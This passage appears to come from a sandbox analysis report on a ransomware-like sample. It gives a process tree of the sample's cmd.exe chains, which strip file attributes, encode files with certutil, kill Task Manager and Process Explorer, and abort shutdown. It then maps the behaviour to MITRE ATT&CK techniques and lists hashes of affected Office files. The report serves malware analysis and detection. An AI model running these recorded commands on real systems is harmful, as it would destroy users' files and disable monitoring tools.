    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:316
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ka.txt" "ka.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:436
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1648
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ka.txt" "ka.txt".14849
        5⤵
        
        PID:1928
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1764
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1820
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "kaa.txt" "kaa.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:660
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1664
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "kaa.txt" "kaa.txt".14849
        5⤵
        
        PID:1812
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1596
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1624
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "kab.txt" "kab.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1468
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:912
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "kab.txt" "kab.txt".14849
        5⤵
        
        PID:788
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1068
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1680
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "kk.txt" "kk.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1792
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1760
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "kk.txt" "kk.txt".14849
        5⤵
        
        PID:1428
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1672
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1520
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ko.txt" "ko.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1920
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1296
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ko.txt" "ko.txt".14849
        5⤵
        
        PID:304
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1316
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1696
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ku-ckb.txt" "ku-ckb.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:648
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:656
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ku-ckb.txt" "ku-ckb.txt".14849
        5⤵
        
        PID:2036
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1716
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1420
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ku.txt" "ku.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1748
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1900
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ku.txt" "ku.txt".14849
        5⤵
        
        PID:1016
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:324
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1688
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ky.txt" "ky.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1576
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1756
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ky.txt" "ky.txt".14849
        5⤵
        
        PID:1364
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1892
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1880
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "lij.txt" "lij.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1540
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1732
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "lij.txt" "lij.txt".14849
        5⤵
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:760
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:940
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "lt.txt" "lt.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1616
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1992
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "lt.txt" "lt.txt".14849
        5⤵
        
        PID:1888
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1336
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1440
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "lv.txt" "lv.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1960
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1464
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "lv.txt" "lv.txt".14849
        5⤵
        
        PID:1684
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1452
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1712
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mk.txt" "mk.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1512
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1520
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "mk.txt" "mk.txt".14849
        5⤵
        
        PID:1792
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1352
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1656
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mn.txt" "mn.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:424
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1696
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "mn.txt" "mn.txt".14849
        5⤵
        
        PID:1920
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1488
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:900
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mng.txt" "mng.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1164
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1420
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "mng.txt" "mng.txt".14849
        5⤵
        
        PID:648
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1816
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:744
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mng2.txt" "mng2.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1944
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1688
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "mng2.txt" "mng2.txt".14849
        5⤵
        
        PID:1748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1204
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1388
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mr.txt" "mr.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1692

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x58c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1556

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-999675638-2867687379-27515722-1000\desktop.ini.20850

Filesize
234B

MD5
96c9c6b406f135e671259162e3297a7f

SHA1
46afd118a72f0d6eff37df1cb5a2736bb09256d0

SHA256
2334f05350be7eb42137eea6a49abb1fc501462c278a9c1af98a8d8da8042346

SHA512
6b062840792daf34af7f5c384e83caefb206a897f9003856530adadd8fcb5b481e277af579a0609837d6c83bf6cf2935efe12be4f5aa5769e3b0162053c602a1

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab.14849

Filesize
31.3MB

MD5
fb342ec1fae7d6514e35d4b5b3f9333f

SHA1
f7d535ef092e58afa24d165ce8818c0efce55731

SHA256
c6a8e925cf46ff4393b4fbd31e5ddb85008ed4a9748af97e8bb45bb9de837ec2

SHA512
0a3379de21c15f4f16d605169e2124dc36f903fda505f35d7014a19664e1546b4b8130dffd29478166af4c0afc95f5ba64aba7233286270a1eef9250b2d34953

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.msi.14849

Filesize
4.0MB

MD5
2e750e1e62d50a22ca8b5d094b3a64b0

SHA1
8ed3d6ca08a07cca58dfceacf7bee6cb68f73cd1

SHA256
f8bc9fcaccd9a0e402b77cf8e8022d29586953ffdbb58d94e4aca8594525b0ad

SHA512
9dd7c8afc80d2059d6eca64df586bbfa138a8922d18997192f41588105a6e8c0afdeac9d7fae5e52c3305f3b242e86c5b03917ad03229a67eaa19056bba356e3

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml.14849

Filesize
6KB

MD5
a5ff962fa610d9f78c3c9511d24f05e8

SHA1
9e9745ecfc1b82bc29f0a044385704b592724918

SHA256
92ee9f0fdb128e2f9e6886ec0e5abd844e6027738d86d7222628e73342e8eb7a

SHA512
081e86f6d4a2c9adcff01b03b899aaae4a9d860333ff49c086c4aef30b65542b2e24d193dd9879a2fc54552c42a4aab9f26bf76f45544e7e1f88dd17cfdc688c

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\PidGenX.dll.14849

Filesize
1.6MB

MD5
70a412c8ae4cd76591c3df39e2d131d4

SHA1
bdbf27c22eb2d3bc72f1f87326200c5014ae8481

SHA256
be06d41463c20fd56417b99e83e20c8456b1016981548f304ca7b13f4d56c2f3

SHA512
6d66b2c1afcc073a343ff06cdccc4ea8c7b0ab36c02bb119ef5d3174835debbd582d008478a7d74f44c52607cce880d008c91a68c519358daeac79dc4ccdebd4

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi.14849

Filesize
32.5MB

MD5
77e8072b4982c4f95d6b1bbbbdb30a15

SHA1
8ae3d8d7e901d9bd834a8f337eb0004843cbf512

SHA256
ee516b17ef3ade87b7806891718960883cafb54d41e44f2e5b365152024f0b46

SHA512
fa9de093c1ac81129688591fbc5f8edd02021422f26e4e01516da635e11d8b2ef8e427fc16db01b6413d30616cb375f4b06103675bc85791866a2b40d8ca9002

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml.14849

Filesize
23KB

MD5
7465e39a3c01c5ce7d8a3cb3775d7622

SHA1
46fe5b354b7c14814784694187223fad6256510d

SHA256
0516a04ac56586e0cc819b356e74a21c3d86d2fdc829d1a41623a9b0a8e3251c

SHA512
d273b958c31f9b69176abbdf33fef6d65579600cb5ecdfe5cf0ed16cf1aa753d389de65cce06bda25dfa3a253de9c31fb89cc2bf0ef10e6021c0cdd9c785155d

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe.14849

Filesize
200KB

MD5
380a16688c344bd310b9ff5ba90683a3

SHA1
9902e9fc77fdd48634cb236e036b6df578522211

SHA256
89228484bfacc0a9d234d9395819501d1103f9535eb8b43758ae99b418bf02c2

SHA512
63e2cc182e257ffc94bf241efd74cc4437f656b09cfa22c618fdbf92c6f7dfcf1be24748538855b86a80fbd844f74942de83a08016999d9b88d175980ea6e778

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\osetup.dll.14849

Filesize
7.6MB

MD5
625eb70ab7a8acf35615edaf3b5e9cc6

SHA1
ce3e9b52292992f083c65e3331c990f556e942c1

SHA256
ff84b466bf66f849745839409b464e4b3a3ead1e60c8569d173283a6db6ea722

SHA512
7eeddbdc64e13ff33dcc7018f54d118ea8d658742658642afdd64fbb021bb310b900a1820451c4906f31c60d40837881cb06e506b91d847d39aaae8392c9a0bb

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\pkeyconfig-office.xrm-ms.14849

Filesize
961KB

MD5
77e13dd3803036870ceed613a7e68358

SHA1
a75b58812d52dd754325e2471a002e6db0d35d68

SHA256
fe30373797fb88abad235e9e224a3799ec742e3fee84a2f5e27d4cb19a489008

SHA512
a914f4aa24d9f279f6950e4d8d931291c121e33923dd6d012c2390e13612f5538ed0ffeed17d894fd5864a80a074276778e26042e09b9c7925b0e84f3cf3c057

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\setup.exe.14849

Filesize
1.4MB

MD5
84e097185a69941e011e3af8f7465e8e

SHA1
be0c0e52c005c335e1136de8bf433d4655601d73

SHA256
a3df67b25fc8b89740c9ed1a685ddc95f238d3b980fd6e9339a45493dc5f2f59

SHA512
83fc6f4c1dc333bc60089d7bafb9c9b684cc1b10c22f4ca4af13c2f254680c4248d39ed41110d68169d8c8f6c0d3a6ce31b71f256ab534fc8fca2ad0086cc019

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelLR.cab.14849

Filesize
22.1MB

MD5
20bd06938e0ba36467d4b36b6dd83082

SHA1
3137fdc1f2e14357b21a5fd59bddf7443bd4c855

SHA256
9fad2a010ada5f3da25f85a5e6258b39dea21ae482a6752c73b074d52a4439d6

SHA512
f0dc08ac574b1e88c0501c39a516ba30ca3a03ce4bf55817c6430725f2110068aefd9db2b7b84f873479c4b9fc39b3d6d3d4be746df241a42207828fe0c8b964

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi.14849

Filesize
2.4MB

MD5
e1abf65fc22288a1ecb24df9735f79e7

SHA1
78fdde9270acfb06d3d1d7fda6a524c882ccd01b

SHA256
fb85a666a6393fc47f2cad29e8763febf8867b619cf8792c1716be9368b41a6a

SHA512
be88d0bef554f4913427c14c16275f1985f769f9df901fd3ce30765076a4a2723eeeb85ff6a50fb3b69bf04e7f5fe082a7b9f00d749882943be40367c1393956

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml.14849

Filesize
2KB

MD5
ac342e8059cc0738e20350aa88788199

SHA1
c54962d3b09341e80f83f99ff9bf060f37638b1b

SHA256
f150833b76af1ac45e64394c406b2ae29853818b73377cd2f2d577f590d98184

SHA512
bebc9da09998b6f391b774b60a2a8ab7af49841a5987b68a0c89f8ae34190430259bbec71aa6a82f2c952843706fa5ec8bd4ede35ed9c256f3f11637cea424dd

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.msi.14849

Filesize
2.4MB

MD5
8d715f5ab19506584ec512ef2d9365ae

SHA1
5b6062c3469f7c26ddf841e117d2c6f3953176f4

SHA256
44259aefdc1e50b1eee90ad6fcabd5bf8d7cfde017bed4acd84fb16d0eef98e5

SHA512
ed405f519498678a95c350ec5061037a5e0ed13f164b8e36d60b7fc5df8fc2571fbf2b81ccb6e6b923f828e313f3d1a32851032fe768c7b2adfcb7398d8bd8d6

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml.14849

Filesize
2KB

MD5
01a2eec44f12c8277e7c111049ff48e8

SHA1
a82983619c220536b691f5c18272e5030c77ff3f

SHA256
8ed02501c911a0d78afc160eb83b60494c63da117638c9fee8b1e7643ffaead2

SHA512
0ef35db698d2c3ed6682ca80ee9ec536a583c8b9b17720494fe961c678aee5fe0d7863fe0ff2d04263243b86a352f20de692c7f49c4a047d4b1f8103101d0a9b

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PptLR.cab.14849

Filesize
93.1MB

MD5
4af182179f51f851b4a1ce9fcad254ce

SHA1
61084dad7e9541ad1ef0e6ff6443b1b55c57fa82

SHA256
013b72d37d8c70e9d7161f70ffca36ff4f0449b5f38bea178a583b0a8afe70d0

SHA512
d83df7161d00b1ab3b90e55c8ddf94e2c401c8d2b65005dceb7856c30f20fa457ae1d92dbffd64aeb6754b65c071f1d53db13056bd03a25784c658d5e5e186bf

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PubLR.cab.14849

Filesize
13.1MB

MD5
66c0566304de8a07d8fd53e37b9d2957

SHA1
97b27ac2b2afa70756d3bcf44601a322f83a5eba

SHA256
0b9c2cadb7ac687ef26940ad502a5983b0193a653d052d0bc18360f26d72e92a

SHA512
c3d1939faf4d97f61a643f2e3e34525d12dd2208c5a48e5b3fabebccfade2a5b3c43bdee7ed6e28fe59ae1bf1299c98160cf218d649f8de0f7c36a1d4a7d5c32

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.msi.14849

Filesize
2.4MB

MD5
6d468930da10e25d95e01b4c6bc55e7c

SHA1
6f46c4c6ef5edd5574571f2c06d2b040e497e271

SHA256
e4fadfc5fbf088255bd6c175f3f1903b2c424fd6f241a7ad83c3d28074470795

SHA512
3da9e517ddb15b53f8f541e60c021956261f28fc38a218e2c70916115869af45879b052277370e0be81bcd8dc93ed2e6b3a942864632c990e956db7bb6f2b1b8

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml.14849

Filesize
2KB

MD5
2b27360752048fbae83bd2ac72fb4b3d

SHA1
a4d6b7c7a5aed20d8d8d8e09009cf8f9d0dcac6e

SHA256
a3003c593407233c20a69c6cb3129aaadd048d15e9771ca5af58032938ccde97

SHA512
ad04d803555bdcd8cbac141adb998eed200b9e2e46907c7d0e73aed54f089e7d567fae94144ce53fa72d657068bcff798aa8f80ad7c871f22117984d550807c8

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlkLR.cab.14849

Filesize
19.4MB

MD5
332c8d915ed76945820859887648e05d

SHA1
2c450b838d55a2eb4b8604a7be2cb1708df1bacd

SHA256
d788b310132edba059837869ccd6268fb8331f3d5bbc9f05df26044957eed0dd

SHA512
7c5c30e3e9235f8007a7091ebeff01dd32ac4760ec3119262a5190cb50d7bab3ac7705d89eab7ade65edf512d1968cc99f74735bc8d9c022452ef96b5a321088

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.msi.14849

Filesize
2.8MB

MD5
0ee23428407282bab2a0538722ef13c6

SHA1
23767c8555e3ce78dc74f5ca01952cde78bb5bbc

SHA256
2e3840a5c708a2eb80a8bb68e63e91a73993048fa0e6a4453f8234758acedcb7

SHA512
ae15a262944978661175520a1008448875e6697079a2fed41e37a6ed86c1062709bb8e8560cbe8b3aa5755a3c9483e9f4d01328b3c2ca7d83655509db54fe3f1

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml.14849

Filesize
4KB

MD5
9d8e3037d50779ba2bf8137547717763

SHA1
5139aaea9093cb74d0123960f5f059685fb4b09f

SHA256
8297be8e5130f801fe70f16f313bf653becba50589e2a94e77b9f4faf90db266

SHA512
3c7fa48c712507281fe87905cf6b7deae4b12c4ce1bdf64b7e60e7b8bc5d6747e46e003f184ca979f2c3d8ec1a2265a35d22359c86d4faf52c5673c5d40ba3cd

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml.14849

Filesize
3KB

MD5
287233b43955151ccb457fd76cd43774

SHA1
65ca9ec10ada10f172d31014c1117aab6aba3df1

SHA256
8f253a6de2476047c4aff50625b8fd9791ae208772a94968a9ea72f8ec12d88a

SHA512
708914b2354a66a8ae87454243f23169d0ca15592b522906c955675313574a4fe6835b84c835dd3f2311e8a04ceec55ae046c8de8efd3914c3adfe6e840afd3b

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordLR.cab.14849

Filesize
57.4MB

MD5
6d60ddfb505e4d4b76c2a713318bc56e

SHA1
f4853c8dfa2aa6bfdde0e1be6bc9d59304ed1bc6

SHA256
ab3a3a726c23ac52d01d03d0c4cbdb285324af1eb1b4d2586000731f3c2a9eef

SHA512
f0f32059f026678e279b5a122d645eadd7c6a23c8848f485f7bfabd682b14a07ab8df4ab8b9f48b70b6e506bbee4779fddf95d1af849aa65d49a32620cd1dd39

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.msi.14849

Filesize
2.4MB

MD5
0128672a3b176ea0033ffc423df65455

SHA1
7796fe321a36fed50ed23ea682fc3d72d05e2826

SHA256
427df29225e4b8a1eb25068faaeb0ee2ad616511c3817c9b55af812cbfd70e76

SHA512
0421b90f36b163c77fdca47a46257ec708a35d2b3afcf230071964694fcbc74d79ccba58e15257df0624f6f8684fdddf36a42e9f233c2b9c24eccfb5b61fe545

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.cab.14849

Filesize
14.3MB

MD5
4549408744ac7e6246ebe75fe8532af3

SHA1
b25c0a13d4a76feb0ae6653d07c04ecc4b5fd6bd

SHA256
b682fbbcd6e0274a5cacbf385a2bfee27e58b83d320017687c44fe8fedde433c

SHA512
c62f8d37f7d2af0ba08f4b3bbfd56f34e0a204654840523b25920ef3006c8a9d6beed90bcd66166fd58d44927370f3fdb06704f547279d7fff048ca628550226

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.msi.14849

Filesize
882KB

MD5
6af3b4088caad4f492008763422605da

SHA1
cc985ca7d2ac5d26f9f282be55edf198e487d260

SHA256
550490f9cdac7e71d4077cfa7e613de2eb90c40e7ddd605d99a028e931add8e1

SHA512
655e8566c9445202d128133e4eedc242e62201db098521620b4772b8020e19223b683238cad326776387358b7ccb4cc863014d4b2abe49674e4f7c252d445d0b

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.cab.14849

Filesize
17.3MB

MD5
9fcceb5a8e477bda1c988e7e5625715b

SHA1
e89fb15ed347cabfefd3a4170d115323292cfb70

SHA256
70a76a2d19ed76ab895cd9a7031d98c3000310d512e9ee87edcec53b2890418f

SHA512
9cd5cbc12afe372a0e0631caf3673204b6ef4f2eced3dcc3c4e45d808dfef2811f6aaee477bf8c6823fa4a5c38d88c2a13e0b1398a533940324e7dde47e78ea0

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.msi.14849

Filesize
890KB

MD5
eac0c845f3ee0c94123a8639e6ecf7f6

SHA1
0378102edd221ad3b960b4e05cecde7e78560aad

SHA256
200bf0c332bbdc4dbc63748f2595d8c35a3f3e86ae62f73753209ba13eae077b

SHA512
1bc908724b70dba8748c10587432441481300990f760f6276e05e99016cb904b15028fef616beabde2e7638c211204d3f4d8dd134fb9363c63e00c95c3f78515

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.cab.14849

Filesize
26.8MB

MD5
0988a30b2162af7e20ba706040002722

SHA1
bb4f24953cf4c4162641c6b09e0a4f80d9d24d11

SHA256
bee8c36252615b246f834b7d861d3e41a3ed91f9773c2ce7cb700ccdd5ac0d95

SHA512
31fdf0b2184ac9e548eeb889bffedde7ef4e65bff8977d55f5953eca6d2f941fcc74c985e661897a873732741a0045aba05c5bf00776f1238753d639638ecf44

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.msi.14849

Filesize
896KB

MD5
9d7d46bdf6b1704ee562a4fd4b5be6c9

SHA1
75a6998bfc12010204f063c722f1fb2ae8d72e92

SHA256
e19cb0e5a84714e930e11fbbc8a39bbcd4feacbc41e12c74f58bd5fd9ed6ddd0

SHA512
403af42607a68bcd725edbc509a6c82f25e1181bc3f5d2946ad59859eec50c0b7e45155566d950d9d3fb2241a226050405d0136c1e0ed14d720a54ea9e38ef3d

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.msi.14849

Filesize
873KB

MD5
c1d1574530d04961833aa9506cb9a877

SHA1
cc19081b4e280ac720e4e3d4b982b3695f47830b

SHA256
3e4e0a893eeedb15aba575db3431c8aaca42e2451ad45557988c214bbd0bafd2

SHA512
b94180e522f9ac741f509573a20ad0c7cee86f6dc620c3232faad5d872c9e74c6c378ce76ac0fbe2ce27e3ad2fcf05ce9c9633009c59e9f4fc19c8ecd35dba19

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml.14849

Filesize
1KB

MD5
9db9275f2d7174a4011721c67564b2e5

SHA1
